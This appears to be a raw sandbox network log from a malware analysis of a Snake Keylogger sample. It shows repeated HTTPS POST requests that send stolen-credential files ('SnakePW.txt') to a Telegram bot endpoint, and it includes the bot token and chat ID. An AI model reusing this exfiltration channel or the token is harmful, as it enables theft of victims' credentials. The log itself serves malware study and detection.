                            7192.168.2.549775149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:41 UTC11OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756d5f47c57
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:41 UTC12OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 35 66 34 37 63 35 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756d5f47c57Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:41 UTC12INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:41 GMT
                            Content-Type: application/json
                            Content-Length: 509
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:41 UTC13INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 35 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66753,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228761,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            70192.168.2.549890149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:08 UTC118OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756e615e0c5
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:08 UTC118OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 36 31 35 65 30 63 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756e615e0c5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:08 UTC119INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:08 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:08 UTC119INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 32 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66824,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228788,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            71192.168.2.549893149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:08 UTC119OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756e6517b64
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:08 UTC120OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 36 35 31 37 62 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756e6517b64Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:08 UTC120INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:08 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:08 UTC121INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 32 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66826,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228788,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            72192.168.2.549895149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:09 UTC121OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756e688517c
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:09 UTC121OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 36 38 38 35 31 37 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756e688517cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:09 UTC122INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:09 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:09 UTC122INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 32 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66827,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228789,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            73192.168.2.549898149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:09 UTC123OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756e6c3ec41
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:09 UTC123OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 36 63 33 65 63 34 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756e6c3ec41Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:09 UTC124INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:09 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:09 UTC124INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 32 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66828,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228789,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            74192.168.2.549901149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:09 UTC124OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756e701e98c
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:09 UTC125OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 37 30 31 65 39 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756e701e98cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:10 UTC125INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:10 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:10 UTC126INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 32 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66829,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228790,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            75192.168.2.549904149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:10 UTC126OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756e73d84c1
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:10 UTC126OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 37 33 64 38 34 63 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756e73d84c1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:10 UTC127INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:10 GMT
                            Content-Type: application/json
                            Content-Length: 509
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:10 UTC127INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 33 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66831,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228790,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            76192.168.2.549906149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:10 UTC128OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756e7745a71
                            Host: api.telegram.org
                            Content-Length: 504
